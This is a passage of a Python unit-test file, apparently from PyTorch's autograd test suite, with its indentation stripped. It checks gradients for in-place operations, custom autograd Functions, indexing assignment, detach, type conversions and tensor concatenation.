y = Variable(torch.ones(5, 5) * 4, requires_grad=True)
z = x * y
q = z + y
w = z * y
z.add_(2)
# Add doesn't need it's inputs to do backward, so it shouldn't raise
q.backward(torch.ones(5, 5), retain_graph=True)
# Mul saves both inputs in forward, so it should raise
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
z = x * y
q = z * y
r = z + y
w = z.add_(y)
# w is a the last expression, so this should succeed
w.backward(torch.ones(5, 5), retain_graph=True)
# r doesn't use the modified value in backward, so it should succeed
r.backward(torch.ones(5, 5), retain_graph=True)
# q uses dirty z, so it should raise
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
with torch.no_grad():
x.grad.zero_()
m = x / 2
z = m + y / 8
q = z * y
r = z + y
prev_version = z._version
w = z.exp_()
self.assertNotEqual(z._version, prev_version)
r.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.ones(5, 5) / 2)
w.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.empty(5, 5).fill_((1 + math.e) / 2))
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
leaf = torch.ones(5, 5, requires_grad=True)
x = leaf.clone()
x.add_(10)
self.assertEqual(x, torch.ones(5, 5) * 11)
# x should be still usable
y = x + 2
y.backward(torch.ones(5, 5))
self.assertEqual(leaf.grad, torch.ones(5, 5))
z = x * y
x.add_(2)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
def test_mark_non_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input > 0
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return (grad_output * 0).to(torch.double)
x = torch.randn(5, 5, requires_grad=True)
mask = MyFunction.apply(x)
self.assertFalse(mask.requires_grad)
y = x.masked_fill(mask, 0)
y.sum().backward()
def test_mark_non_differentiable_mixed(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
a = input + 1
b = input + 2
ctx.mark_non_differentiable(a)
return a, b
@staticmethod
def backward(ctx, grad_a, grad_b):
self.assertTrue((grad_a == 0).all())
self.assertTrue((grad_b == 1).all())
return grad_b
x = torch.randn(5, 5, requires_grad=True)
a, b = MyFunction.apply(x)
self.assertFalse(a.requires_grad)
self.assertTrue(b.requires_grad)
b.sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5))
def test_mark_non_differentiable_none(self):
# This used to segfault because MyFunction would send back null
# gradients to MulBackward, which is implemented in C++. C++
# implemented functions expect incoming grad_ouptuts to be non-null.
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input.clone()
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return None
x = torch.randn(5, 5, requires_grad=True)
r = MyFunction.apply(x * x)
(r * x).sum().backward()
def test_return_duplicate(self):
class DoubleDuplicate(Function):
@staticmethod
def forward(ctx, x):
output = x * 2
return output, output
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def fn(x):
a, b = DoubleDuplicate.apply(x)
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(fn, [x])
gradgradcheck(fn, [x])
def test_return_duplicate_inplace(self):
class DoubleInplace(Function):
@staticmethod
def forward(ctx, x):
x.mul_(2)
ctx.mark_dirty(x)
return x, x
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def inplace_fn(x):
a, b = DoubleInplace.apply(x.clone())
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(inplace_fn, [x])
gradgradcheck(inplace_fn, [x])
# Can't modify leaf variables in-place
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x))
# Functions which modify views in-place must return only one output
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x.clone()[0]))
@suppress_warnings
def test_resize(self):
x = torch.ones(2, 3)
self.assertTrue(x.resize(3, 2).size() == (3, 2))
def _test_setitem(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
y[index] = 2
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad = torch.ones(*size)
expected_grad[index] = 0
self.assertEqual(x.grad, expected_grad)
def _test_setitem_tensor(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
value = x.new(x[index].size()).fill_(7)
value.requires_grad = True
y[index] = value
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad_input = torch.ones(*size)
expected_grad_input[index] = 0
self.assertEqual(x.grad, expected_grad_input)
self.assertEqual(value.grad, torch.ones_like(value))
# case when x broadcasts to as y[1]
x = torch.randn(4, requires_grad=True)
y = torch.zeros(2, 3, 4)
y[1] = x
y.backward(torch.randn(2, 3, 4))
self.assertEqual(x.size(), x.grad.size())
def test_setitem(self):
self._test_setitem((5, 5), 1)
self._test_setitem((5,), 1)
self._test_setitem((1,), 0)
self._test_setitem((10,), [[0, 4, 2]])
self._test_setitem((5, 5), [[0, 4], [2, 2]])
self._test_setitem((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5), 3)
self._test_setitem_tensor((5, 5), [[0, 1], [1, 0]])
self._test_setitem_tensor((5,), 3)
self._test_setitem_tensor((5,), Variable(torch.LongTensor([3]), requires_grad=False).sum())
self._test_setitem_tensor((5,), [[0, 1, 2, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem_tensor((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem_tensor((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem_tensor((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5, 5), [Variable(torch.LongTensor([1,
3]), requires_grad=False), [2, 4], slice(None)])
def test_setitem_mask(self):
mask = torch.BoolTensor(5, 5).bernoulli_()
self._test_setitem((5, 5), Variable(mask))
self._test_setitem((5,), Variable(mask[0]))
self._test_setitem((1,), Variable(mask[0, 0:1]))
self._test_setitem_tensor((5, 5), Variable(mask))
self._test_setitem_tensor((5,), Variable(mask[0]))
def test_select_sum(self):
# both select and sum return Scalars in ATen; ensure they work together.
x = torch.randn(10, dtype=torch.double, requires_grad=True)
def func(x):
return x.select(0, 1).sum()
gradcheck(func, [x])
gradgradcheck(func, [x])
def test_diagonal_expanded_v(self):
value = torch.rand([])
v_expanded = torch.tensor(value).expand(10)
a = torch.rand(10, 10, dtype=torch.double, requires_grad=True)
result, = torch.autograd.grad(a.diagonal(), a, v_expanded)
self.assertEqual(result, torch.eye(10, dtype=torch.double) * value)
def test_select_expanded_v(self):
v_expanded = torch.rand(10).expand(10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[0], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[0] = v_expanded
self.assertEqual(result, expected)
def test_slice_expanded_v(self):
v_expanded = torch.rand(10, 1).expand(2, 10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[3:5], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[3:5] = v_expanded
self.assertEqual(result, expected)
# TODO: opinfo this or move to unbind's test suite
def test_unbind(self):
stacked = torch.randn(3, 10, 10, requires_grad=True)
x, y, z = stacked.unbind()
grad = torch.randn(3, 10, 10)
torch.autograd.backward([x, y, z], grad.unbind())
self.assertEqual(stacked.grad, grad)
# check that it works with only one gradient provided (#9977)
for i in range(3):
stacked = torch.randn(3, 10, 10, requires_grad=True)
outs = stacked.unbind()
gi = grad.unbind()[i]
g, = torch.autograd.grad(outs[i], stacked, gi)
g_expected = torch.stack([gi if j == i else torch.zeros_like(gi)
for j in range(3)], dim=0)
self.assertEqual(g, g_expected)
# TODO: opinfo this or move to fill's test suite
def test_fill(self):
root = torch.randn(4, 5, requires_grad=True)
def func(root):
x = root.clone()
x.fill_(2)
return x
gradcheck(func, [root])
gradgradcheck(func, [root])
def test_unused_output(self):
x = torch.randn(10, 10, requires_grad=True)
outputs = x.chunk(5)
o = outputs[2]
o = o * 4 + 2
o.sum().backward()
expected_grad = torch.zeros(10, 10)
expected_grad[4:6] = 4
self.assertEqual(x.grad, expected_grad)
with torch.no_grad():
x.grad.zero_()
grad_output = torch.randn(2, 10)
outputs = x.chunk(5)
outputs[0].backward(grad_output)
expected_grad = torch.zeros(10, 10)
expected_grad[:2] = grad_output
self.assertEqual(x.grad, expected_grad)
# TODO: opinfo this or move to the sparse test suite
def _test_sparse_gather(self, size_x, size_ind, dim):
x = torch.randn(size_x, requires_grad=True)
if len(size_ind) > 0 and len(size_x) > 0:
ind = torch.randint(x.size(dim), size_ind)
else:
ind = torch.zeros(size_ind, dtype=torch.int64)
out = torch.gather(x, dim, ind, sparse_grad=False)
grad = torch.rand_like(out)
out.backward(grad)
grad_dense = x.grad.clone()
x.grad = None
out = torch.gather(x, dim, ind, sparse_grad=True)
out.backward(grad)
self.assertEqual(grad_dense, x.grad.to_dense())
def test_sparse_gather_dim0(self):
self._test_sparse_gather((10, 10), (5, 10), 0)
def test_sparse_gather_dim1(self):
self._test_sparse_gather((10, 10, 5), (10, 5, 5), 1)
def test_sparse_gather_dim_neg(self):
self._test_sparse_gather((10, 10, 5), (10, 10, 2), -1)
def test_sparse_gather_ind_scalar(self):
self._test_sparse_gather((10,), (), 0)
def test_sparse_gather_x_scalar(self):
self._test_sparse_gather((), (2,), 0)
def test_sparse_gather_both_scalar(self):
self._test_sparse_gather((), (), 0)
def test_gc_in_destructor(self):
"""
Previously, if a Function destructor triggered a garbage collection,
the Variable's tp_dealloc handler would get called twice leading to a
segfault.
"""
class CollectOnDelete(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
def __del__(self):
gc.collect()
for _ in range(10):
CollectOnDelete().forward(torch.randn(1, requires_grad=True)).backward()
def test_naughty_autograd_function_attribute_access(self):
class Id(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad_x):
return grad_x
with self.assertWarnsRegex(DeprecationWarning, "should not be instantiated"):
f = Id()
# # After raising warning, should still return an instance
self.assertIsInstance(f, Id)
x = torch.zeros(1, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "non-static forward method is deprecated"):
f(x)
t = Id.apply(x)
self.assertEqual(t.grad_fn.name(), "IdBackward")
# THPFunction is the base class of both grad_fn and autograd functions,
# which means that a lot of accessors on them may segfault. Test that we
# properly error in this case.
t = torch.ones(1, requires_grad=True)
t._backward_hooks = dict()
with self.assertRaisesRegex(RuntimeError, "Attribute '_register_hook_dict' is invalid"):
f._register_hook_dict(t)
with self.assertRaisesRegex(RuntimeError, "Attribute 'register_hook' is invalid"):
f.register_hook(lambda x, y: None)
with self.assertRaisesRegex(RuntimeError, "Attribute 'next_functions' is invalid"):
f.next_functions
with self.assertRaisesRegex(RuntimeError, "Attribute 'name' is invalid"):
f.name()
with self.assertRaisesRegex(RuntimeError, "underlying PyNode has already been deallocated"):
f.metadata
@unittest.expectedFailure
def test_naughty_anomaly_access(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, g):
return g
x = torch.zeros(1, requires_grad=True)
y = MyFunction.apply(x)
y.backward()
y.grad_fn.metadata
g = y.grad_fn
del y
g.metadata # this currently fails, but shouldn't
def test_naughty_autograd_function_stashing_ctx(self):
saved_ctx = []
class Id(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_ctx.append(ctx)
return ctx.saved_tensors
p = torch.zeros(1, requires_grad=True)
loss = Id.apply(p)
loss.backward(retain_graph=True)
del loss
# At this point in time, it complains that the graph has been freed
# (which indeed true, although a somewhat indirect way of stating the
# problem).
self.assertRaises(RuntimeError, lambda: saved_ctx[0].saved_tensors)
def test_custom_autograd_repeated_grad_grad(self):
# This test failed the equality check in PR #22983; it's an interesting
# and different test case worth enshrining. mult1 is not testing
# anything that interesting, but mult2 is the interesting case.
def mult1(x):
return x.prod(dim=-1).prod(dim=-1)
class Mult(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = mult1(x)
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return (grad_output * y)[:, None, None] / x
mult2 = Mult.apply
def check_gradgrad_repeated(x, y):
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_1, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_2, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
self.assertEqual(ggy_1[0, 0, 1], ggy_2[0, 0, 1])
x = torch.ones(2, 4, 4).requires_grad_()
check_gradgrad_repeated(x, mult1(x))
check_gradgrad_repeated(x, mult2(x))
def test_custom_autograd_no_early_free(self):
# This test failed complaining that buffers had already been freed
# prior to #22983. Also pretty interesting test case.
class Double(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = x ** 2
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, _ = ctx.saved_tensors
return grad_output * 2 * x
# this is equivalent, but uses the output of .forward() in .backward()
class Double2(Double):
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return grad_output * 2 * y / x
double = Double.apply
double2 = Double2.apply
x = torch.tensor(2).double().requires_grad_()
self.assertTrue(gradcheck(double, x))
self.assertTrue(gradgradcheck(double, x))
self.assertTrue(gradcheck(double2, x))
self.assertTrue(gradgradcheck(double2, x))
y = double(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x)
y = double2(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x) # should not error!
def test_detach(self):
x = torch.randn(10, 10, requires_grad=True)
y = x + 2
y = y.detach()
z = y * 4 + 2
self.assertFalse(y.requires_grad)
self.assertFalse(z.requires_grad)
x = torch.randn(10, 10, requires_grad=True)
y = x * 2
y = y.detach()
self.assertFalse(y.requires_grad)
self.assertIsNone(y.grad_fn)
z = x + y
z.sum().backward()
# This is an incorrect gradient, but we assume that's what the user
# wanted. detach() is an advanced option.
self.assertEqual(x.grad, torch.ones(10, 10))
# in-place detach
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
a = x * 2
(y + a).sum().backward(retain_graph=True)
a.detach_()
self.assertFalse(a.requires_grad)
(y + a).sum().backward() # this won't backprop to x
self.assertEqual(x.grad, torch.ones(10, 10) * 2)
self.assertEqual(y.grad, torch.ones(10, 10) * 2)
# in-place deatch on a view raises an exception
view = x.narrow(0, 1, 4)
self.assertRaisesRegex(RuntimeError, 'view', lambda: view.detach_())
def test_detach_base(self):
"detaching base does not detach view"
x = torch.randn(10, 10, requires_grad=True)
view = x.narrow(0, 1, 4)
x.detach_()
self.assertFalse(x.requires_grad)
self.assertTrue(view.requires_grad)
self.assertIsNotNone(view.grad_fn)
self.assertIs(view._base, x)
def _test_type_conversion_backward(self, t, ):
fvar = Variable(t(torch.randn(5, 5).float()), requires_grad=True)
fvar.double().sum().backward()
self.assertEqual(fvar.grad, torch.ones_like(fvar))
self.assertEqual(type(fvar.grad), type(fvar))
dvar = Variable(t(torch.randn(5, 5).double()), requires_grad=True)
dvar.float().sum().backward()
self.assertEqual(dvar.grad, torch.ones_like(dvar))
self.assertEqual(type(dvar.grad), type(dvar))
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.int(), torch.IntTensor)
if torch.cuda.is_available():
self.assertIsInstance(x.float().cuda(), torch.cuda.FloatTensor)
self.assertIsInstance(x.int().cuda(), torch.cuda.IntTensor)
self.assertIsInstance(x.int().cuda().cpu(), torch.IntTensor)
if torch.cuda.device_count() >= 2:
x2 = x.float().cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
x2 = x.float().cuda()
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 0)
x2 = x2.cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
y = Variable(torch.randn(5).cuda(1), requires_grad=True)
y.cpu().sum().backward()
self.assertIs(y.grad.get_device(), 1)
self.assertIs(y.long().get_device(), 1)
for t in [torch.DoubleTensor, torch.FloatTensor, torch.IntTensor, torch.ByteTensor]:
for y_var in (True, False):
y = torch.randint(5, (5, 5), dtype=t.dtype)
y = Variable(y) if y_var else y
self.assertIsInstance(x.type(t), t)
self.assertIsInstance(x.type_as(y), t)
# TODO: t.dtype should work
t_dtype = t().dtype
self.assertIsInstance(x.type(t_dtype), t)
self.assertIs(t_dtype, x.type(t_dtype).dtype)
self.assertEqual(y.data_ptr(), y.type(t).data_ptr())
if torch.cuda.is_available():
for x_cuda in (True, False):
for y_cuda in (True, False):
x_c = x.cuda() if x_cuda else x
y_c = y.cuda() if y_cuda else y
_, y_type = y_c.type().rsplit('.', 1)
y_typestr = ('torch.cuda.' if y_cuda else 'torch.') + y_type
self.assertEqual(y_c.type(), x_c.type(y_typestr).type())
self.assertIs(y_c.dtype, x_c.type(y_c.dtype).dtype)
self.assertEqual(y_c.data_ptr(), y_c.cuda().data_ptr() if y_cuda else y_c.data_ptr())
self._test_type_conversion_backward(lambda x: x)
if torch.cuda.is_available():
self._test_type_conversion_backward(lambda x: x.cuda())
if torch.cuda.device_count() >= 2:
# one of these has to be the non-default device
self._test_type_conversion_backward(lambda x: x.cuda(0))
self._test_type_conversion_backward(lambda x: x.cuda(1))
def test_isolated_node(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
b = torch.max(a, 1, True)[1].repeat(1, 5).double()
o = (b + a).sum()
o.backward()
def test_shape(self):
x = torch.randn(3, 4)
self.assertEqual(2, len(x.shape))
self.assertEqual(x.shape[0], 3)
self.assertEqual(x.shape[1], 4)
def test_numpy_requires_grad(self):
x = torch.randn(2, 2, requires_grad=True)
err_msg_outputs = r"Can't call numpy\(\) on Tensor that requires grad. Use tensor.detach\(\).numpy\(\) instead."
with self.assertRaisesRegex(RuntimeError, err_msg_outputs):
x.numpy()
with torch.no_grad():
x.numpy()
x = torch.randn(2, 2)
x.numpy()
with torch.no_grad():
x.numpy()
def test_return_leaf(self):
class Identity(Function):
@staticmethod
def forward(ctx, a, b):
return a, a + b
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a + grad_b, grad_b
hook_called = [False]
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q, p = Identity.apply(x, y)
# Make sure hooks only receive grad from usage of q, not x.
def hook(grad):
hook_called[0] = True
self.assertEqual(grad, torch.ones(5, 5))
q.register_hook(hook)
(q + p + x).sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5) * 3)
self.assertEqual(y.grad, torch.ones(5, 5))
self.assertTrue(hook_called[0])
def test_return_leaf_inplace(self):
class Inplace(InplaceFunction):
@staticmethod
def forward(ctx, a, b):
ctx.mark_dirty(a)
return a.add_(b), b + 2
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a, grad_a + grad_b
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
q, p = Inplace.apply(x, y)
self.assertIs(q, x)
self.assertIs(q.grad_fn.__class__, Inplace._backward_cls)
self.assertTrue(q.requires_grad)
q.sum().backward()
self.assertEqual(y.grad, torch.ones(5, 5))
def test_leaf_assignment(self):
x = torch.randn(5, 5)
y = torch.randn(5, requires_grad=True)
z = torch.randn(5, requires_grad=True)
x[0] = y
x[1] = 2 * z
self.assertTrue(x.requires_grad)
self.assertIsNot(x.grad_fn, None)
x.sum().backward()
self.assertEqual(y.grad, torch.ones(5))
self.assertEqual(z.grad, torch.ones(5) * 2)
def test_no_grad_assignment(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5)
with torch.no_grad():
x[0] = y
self.assertTrue(x.requires_grad)
self.assertIsNone(x.grad_fn)
def test_no_grad_modifies_version(self):
x = torch.randn(5, requires_grad=True)
y = torch.randn(5, requires_grad=True)
z = (x * y).sum()
with torch.no_grad():
x *= 2
self.assertRaisesRegex(RuntimeError, 'modified by an inplace operation',
lambda: z.backward())
def test_no_grad_input(self):
class MyFunction(Function):
@staticmethod
def forward(self, x):
return x
@staticmethod
def backward(self, grad_output):
return grad_output
x = torch.randn(5, requires_grad=True)
with torch.no_grad():
y = MyFunction.apply(x)
self.assertTrue(x.requires_grad)
self.assertIsNone(y.grad_fn)
def test_backward_copy(self):
# This tests checks backward engine for a very subtle bug that appreared
# in one of the initial versions of autograd. Gradients tensors were
# simply stored in lists while the function waited for all its gradients
# to be computed. However, sometimes an output was used multiple times,
# so the gradients needed to be summed. Engine used to keep a need_copy
# set of tensors that will need a clone upon next addition and removed
# them from the set as soon as the clone was performed. However, this
# could lead to incorrect results if the same gradient tensor was
# buffered in three places in the graph:
# 1. When accumulating gradients in one of these places it was cloned
# and removed from need_copy set.
# 2. When accumulating in second place, it wasn't in the need_copy set,
# so the gradients were simply accumulated in-place (which already
# modified the grad in 3rd place)
# 3. When accumulating in the third place, it wasn't in the need_copy set
# as well, so the incoming gradient was summed in-place, yielding
# incorrect results in all functions, except the first one.
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5, requires_grad=True)
# Simulate that we're in the middle of the graph
a = x + 2
b = y + 2
c = x + 2
# This op will just return grad_output two times in backward
add1 = a + b
add2 = add1 + c
# Simulate a long branch, so grad_output will get buffered.
for _ in range(4):
a = a * 2
b = b * 2
c = c * 2
branch = a + b + c
out = add2 + branch
# expected gradients are:
# for x: 34 (16 from final a, 16 from final c, 2 from add2)
# for y: 17 (16 from final b, 1 from add2)
grad_output = torch.ones(5, 5)
out.backward(grad_output)
self.assertEqual(x.grad, torch.ones(5, 5) * 34)
self.assertEqual(y.grad, torch.ones(5, 5) * 17)
def test_save_none_for_backward(self):
test_case = self
class MyFn(Function):
@staticmethod
def forward(ctx, input):
ctx.save_for_backward(None, input, None)
return input * input
@staticmethod
def backward(ctx, grad_output):
n1, input, n2 = ctx.saved_tensors
test_case.assertIsNone(n1)
test_case.assertIsNone(n2)
return 2 * input * grad_output
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, 2 * x)
def test_too_many_grads(self):
class MyFn(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None, None
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, torch.ones_like(x))
def test_pickle(self):
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=False)
def assert_strict_equal(var1, var2):
self.assertEqual(var1, var2)
self.assertEqual(var1.requires_grad, var2.requires_grad)
serialized = [pickle.dumps([x, y], protocol=p) for p in range(3)]
for dump in serialized:
xc, yc = pickle.loads(dump)
assert_strict_equal(xc, x)
assert_strict_equal(yc, y)
def test_dep_nograd(self):
class F1(Function):
@staticmethod
def forward(ctx, input):
out = torch.randn(input.size())
ctx.mark_non_differentiable(out)
return input, out
@staticmethod
def backward(ctx, grad_output, ignored):
return grad_output
class F2(Function):
@staticmethod
def forward(ctx, input, ignored):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None
x = torch.randn(5, requires_grad=True)
a, b = F1.apply(x)
b = b + 1 # separate F1 from F2 by another op
self.assertTrue(a.requires_grad)
self.assertFalse(b.requires_grad)
c = F2.apply(a, b)
c.backward(torch.ones(c.size()))
self.assertEqual(x.grad, torch.ones(x.size()))
def test_set_grad_enabled(self):
x = torch.tensor([1.], requires_grad=True)
with torch.set_grad_enabled(False):
y = x * 2
self.assertFalse(y.requires_grad)
with torch.set_grad_enabled(True):
y = x * 2
self.assertTrue(y.requires_grad)
with torch.set_grad_enabled(False):
torch.set_grad_enabled(True)
y = x * 2
self.assertTrue(y.requires_grad)
def test_simple_reentrant(self):
y_data = torch.randn(2, 2)
class Reenter(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x, requires_grad=True)
ctx.y = Variable(y_data, requires_grad=True)
ctx.output_var = ctx.x * ctx.y
return ctx.output_var.detach()
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
ctx.output_var.sum().backward()
return ctx.x.grad * grad_output
# Reentrant starts on CPU thread, finishs on GPU thread
x = torch.randn(2, 2, requires_grad=True)
out = Reenter.apply(x)
out.sum().backward()
self.assertEqual(x.grad, y_data)
def test_reentrant_child_error(self):
# Parent graph.
a = torch.rand(3, 3, requires_grad=True)
c = a * a
# Reentrant child graph.
b = torch.rand(3, 3, requires_grad=True)
e = b * b
f = TestAutograd.SimulateBackwardError.apply(e)
reentrant_root = f.sum()
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will throw an error.
reentrant_root.backward()
return grad
d = ReentrantFunc.apply(c)
with self.assertRaisesRegex(Exception, 'Simulate error'):
d.sum().backward()
# TODO: Create OpInfos for these ops
def test_broadcast_tensors(self):
f_args_variable = (torch.randn(3, dtype=torch.double, requires_grad=True),
torch.randn(1, 2, 1, dtype=torch.double, requires_grad=True),
torch.randn(1, 1, dtype=torch.double, requires_grad=True),
torch.randn(5, 1, 1, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_broadcast_tensors", "broadcast",
lambda a, b, c, d: torch.broadcast_tensors(a, b, c, d),
True, f_args_variable, f_args_tensor)
def test_block_diag(self):
f_args_variable = (torch.randn(1, S, dtype=torch.double, requires_grad=True),
torch.randn(2, S, dtype=torch.double, requires_grad=True),
torch.randn(3, S, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_block_diag", "block_diag",
lambda a, b, c: torch.block_diag(a, b, c),
True, f_args_variable, f_args_tensor)
def test_cat(self):
f_args_variable = (torch.randn(1, S, S, dtype=torch.double, requires_grad=True),
torch.randn(2, S, S, dtype=torch.double, requires_grad=True),
torch.randn(3, S, S, dtype=torch.double, requires_grad=True),
0)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_negdim_1(self):
f_args_variable = (torch.randn(S, S, 1, dtype=torch.double, requires_grad=True),
torch.randn(S, S, 2, dtype=torch.double, requires_grad=True),
torch.randn(S, S, 3, dtype=torch.double, requires_grad=True),
-1)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_negdim_1", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_negdim_2(self):
f_args_variable = (torch.randn(S, 1, S, dtype=torch.double, requires_grad=True),
torch.randn(S, 2, S, dtype=torch.double, requires_grad=True),
torch.randn(S, 3, S, dtype=torch.double, requires_grad=True),
-2)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_negdim_2", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_empty_legacy(self):
f_args_variable = (torch.randn(0, dtype=torch.double, requires_grad=True),
torch.randn(S, S, dtype=torch.double, requires_grad=True))
# gradgradcheck doesn't work, probably because legacy size tracking is wrong somewhere,
# hence False passed below, but gradcheck checked explicitly.
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_empty_legacy", "cat",
lambda a, b: torch.cat((a, b)),
False, f_args_variable, f_args_tensor, check_forward_ad=True)
self.assertTrue(gradcheck(lambda a, b: torch.cat((a, b)), f_args_variable, eps=1e-6, atol=PRECISION))
def test_cat_empty(self):
f_args_variable = (torch.randn(0, S, dtype=torch.double, requires_grad=True),
torch.randn(S, S, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_empty", "cat",
lambda a, b: torch.cat((a, b)),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_trapz(self):
f_args_variable = (torch.randn(2, 3, dtype=torch.double, requires_grad=True),
torch.tensor([[1.0, 2.0, 5.5], [2.3, 0.5, 6.2]], dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_trapz", "trapz",
lambda y, x: torch.trapz(y, x),
True, f_args_variable, f_args_tensor)
def test_var_mean_differentiable(self):
dim = [2, 4]
keepdim = False
input1 = torch.randn(3, 4, 5, 6, 2, 3, requires_grad=True)
input2 = deepcopy(input1)
var1, mean1 = torch.var_mean(input1, dim=dim, keepdim=keepdim)
var2 = input2.var(dim=dim, keepdim=keepdim)
mean2 = input2.mean(dim=dim, keepdim=keepdim)
grad = torch.randn(3, 4, 6, 3, requires_grad=True)
r1 = var1 * var1 * mean1 * mean1
r2 = var2 * var2 * mean2 * mean2
